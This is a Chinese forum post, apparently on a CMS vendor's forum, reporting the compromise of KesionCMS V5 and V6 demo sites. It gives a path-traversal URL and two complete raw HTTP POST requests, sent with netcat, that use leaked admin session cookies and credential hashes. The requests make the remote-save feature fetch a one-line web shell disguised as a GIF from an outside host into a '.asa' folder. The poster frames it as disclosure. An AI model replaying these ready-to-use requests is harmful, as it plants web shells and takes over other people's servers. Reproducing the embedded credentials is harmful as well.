在GOOGLE找到挂马操作及漏洞地址，不知有没帮助。。官方留意下。。。http://www.52niuren.com.cn/club/1.txt

以下是该网址Ctrl+C下来的内容

昨天空闲对官方的两个演示站检测了下，都拿下了，

http://v6.kesion.com/KS_Data/test.asp

http://www.kesion.cn/v55/ceshi.asp

绝无恶意...

V6.0后台的用户能够越级操作，建立目录，删除文件等。地址为（http://v6.kesion.com/admin/include/selectpic.asp?currpath=../.. 列目录）

奇怪的是对于V5这个列目录倒是禁止了（貌似有判断权限），但一个普通的管理用户同样可以拿到网站权限

远程下载保存图片也没有过滤文件类型，这点V6的演示站uploadfiles禁用脚本，而V5的竟然没有禁用

另外即使过滤了或者禁用，也可以通过修改构造数据包然后nc上传新建个.asa类型文件夹得到shell

注：科讯的前台还是很安全的，此次测试的前提条件是利用了演示版的普通管理员账号密码。因此在没有得到账号密码之前，科讯很安全O(∩_∩)O~

--------

以下是本人构造的数据包，nc上传就行了，其中xinli.cpu.edu.cn/1.gif是本人放的一个测试文件一句话，自己可以打开看下

命令行:nc -vv webip 80<*.txt

V6版本=====================================

POST /admin/Include/SaveBeyondfile.asp?action=save HTTP/1.1
Accept: */*
Referer: http://v6.kesion.com/admin/Include/SaveBeyondfile.asp?CurrPath=%2FKS_Data%2FCollect%2F.asa%2f
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: v6.kesion.com
Content-Length: 119
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ctips=; ASPSESSIONIDSQRDDCTT=HOKDODHADIPMMEFDCGODAKCL; KS6v6kesioncom=PowerList=M010001%2CM010002%2CM010003%2CM010004%2CM010005%2CM010007%2CM010008%2CM110002%2CM110003%2CM110005%2CM110006%2CM110007%2CM110008%2CM110012%2CM210002%2CM210003%2CM210012%2CM310002%2CM310003%2CM310012%2CM410002%2CM410003%2CM410012%2CM510002%2CM510003%2CM510006%2CM510007%2CM510008%2CM510012%2CM510012%2CM510014%2CM510015%2CM510016%2CM510017%2CM510018%2CM520003%2CM520004%2CM520005%2CM520001%2CM520006%2CM520007%2CM530001%2CM530002%2CWDXT10000%2CWDXT10001%2CWDXT10002%2CWDXT10003%2CKSMS10000%2CKSMS10001%2CKSMS10002%2CKSMS10003%2CKSMS10004%2CKSMS10005%2CKSMS20013%2CKSMS10007%2CKSMS10008%2CKSMS10009%2CKSMS10010%2CKSMS20011%2CKSMS20012%2CKMST10001%2CKMST10002%2CKMST20000%2CKMST10004%2CKMST10006%2CKMST10013%2CKMST10015%2CKMST10016%2CKMST10014%2CKMST10012%2CKMUA10002%2CKMUA10003%2CKMUA10004%2CKMUA10008%2CKMUA10011%2CKMUA10005%2CKMUA10006%2CKMUA10007%2CKMUA10008%2CKMUA10009%2CKMUA10012%2CKMUA10013%2CKMUA10014%2CKMTL20000%2CKSMM10001%2CKSMM10003%2CKSMM10004%2CKSMS20000%2CKSMS20001%2CKSMS20002%2CKSMS20003%2CKSMS20004%2CKSMS20005%2CKSMS20006%2CKSMS20007%2CKSMS20008%2CKSMS10006%2CKSMS20009%2CKSO10000%2CKSO10002%2CKSO10003&SuperTF=0&AdminName=kesion&AdminPass=dd363252281a9611&RndPassword=GAzMA2FS%5F%2Dtc%5FZp8k6ot&SkinID=1&ModelPower=other1%2Csysset1%2Cuser1%2Clab1%2Cmodel1%2Csubsys1%2Cask1%2Cspace1%2CArticle2%2CPhoto2%2CDownLoad2%2CFlash2%2CShop2%2CMusic0%2CMovie0%2CSupply0%2Cmnkc0%2CJob0&AdminLoginCode=8888&Password=dd363252281a9611&UserName=kesion

ItemName=&wjj=%2FKS_Data%2FCollect%2F.asa%2f&http=http%3A%2F%2Fxinli.cpu.edu.cn%2F1.gif&Submit=%BF%AA%CA%BC%D7%A5%C8%A1

V5版本=====================================

POST /v55/admin/Include/SaveBeyondfile.asp?action=save HTTP/1.1
Accept: */*
Referer: http://www.kesion.cn/v55/admin/Include/SaveBeyondfile.asp?CurrPath=%2Fv55%2FUpFiles%2Farticle%2Fkesion.asa%2F
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.kesion.cn
Content-Length: 143
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSSCDQAA=PNDFIKLANMKNPCDDFMJJIKFH; v550=SuperTF=0&AdminName=kesion&AdminPass=dd363252281a9611&RndPassword=mgSsgUmydcN9d6IaDZHM&SkinID=1&ModelPower=other1%2Csysset1%2Cuser1%2Clab0%2Cmodel0%2Csubsys1%2CArticle2%2CPhoto2%2CDownLoad2%2CFlash2%2CShop2%2CMovie0%2CSupply0%2CJob0&AdminLoginCode=8888&Password=dd363252281a9611&UserName=kesion

ItemName=&wjj=%2Fv55%2FUpFiles%2Farticle%2Fkesion%2F200908%2F.asa%2F&http=http%3A%2F%2Fxinli.cpu.edu.cn%2F1.gif&Submit=%BF%AA%CA%BC%D7%A5%C8%A1

=============================

最后强调：友情检测，希望不要把偶当做恶意的捣蛋者。。

脚本小子类型，拿着别人的AK当拉登，基本html不懂，补不了漏洞才发给官方

重新申明...我也只是想官方尽快把漏洞补上才这么无聊在GG上搜...我也不知道52niuren之前有提过这个东西...最近都在忙少上论坛看贴...并没针对你及伤你心的意图...